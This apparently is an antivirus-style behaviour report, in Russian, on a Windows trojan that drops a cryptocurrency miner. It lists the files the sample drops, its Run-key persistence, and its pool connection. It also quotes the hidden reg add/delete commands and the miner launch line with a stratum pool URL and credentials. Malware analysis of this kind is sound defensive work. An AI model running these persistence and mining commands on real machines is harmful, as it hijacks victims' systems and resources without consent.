Техническая информация
Для обеспечения автозапуска и распространения
Модифицирует следующие ключи реестра
- [HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run] 'RTDHCPL' = 'RTDHCPL.EXE'
Изменения в файловой системе
Создает следующие файлы
- %WINDIR%\syswow64\rtdhcplm.exe
- %WINDIR%\syswow64\zlib1.dll
- %WINDIR%\syswow64\libcurl-4.dll
- %WINDIR%\syswow64\pthreadgc2.dll
- %WINDIR%\syswow64\rtdhcpl.exe
- %WINDIR%\syswow64\zlib.inf
Сетевая активность
Подключается к
- 'mi##.pool-x.eu':80
TCP
Другие
- 'mi##.pool-x.eu':80
UDP
- DNS ASK mi##.pool-x.eu
Другое
Ищет следующие окна
- ClassName: 'EDIT' WindowName: ''
Создает и запускает на исполнение
- '%WINDIR%\syswow64\rtdhcpl.exe'
- '%WINDIR%\syswow64\rtdhcplm.exe' --url stratum+tcp://mine.pool-x.eu --threads=1 --userpass ahatblue.1:x
- '%WINDIR%\syswow64\cmd.exe' /C reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v RTDHCPL /t REG_SZ /d RTDHCPL.EXE /f' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /C reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v RTHDCPL /f' (со скрытым окном)
- '%WINDIR%\syswow64\rtdhcplm.exe' --url stratum+tcp://mine.pool-x.eu --threads=1 --userpass ahatblue.1:x' (со скрытым окном)
Запускает на исполнение
- '%WINDIR%\syswow64\cmd.exe' /C reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v RTDHCPL /t REG_SZ /d RTDHCPL.EXE /f
- '%WINDIR%\syswow64\cmd.exe' /C reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v RTHDCPL /f
- '%WINDIR%\syswow64\reg.exe' add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v RTDHCPL /t REG_SZ /d RTDHCPL.EXE /f
- '%WINDIR%\syswow64\reg.exe' delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v RTHDCPL /f
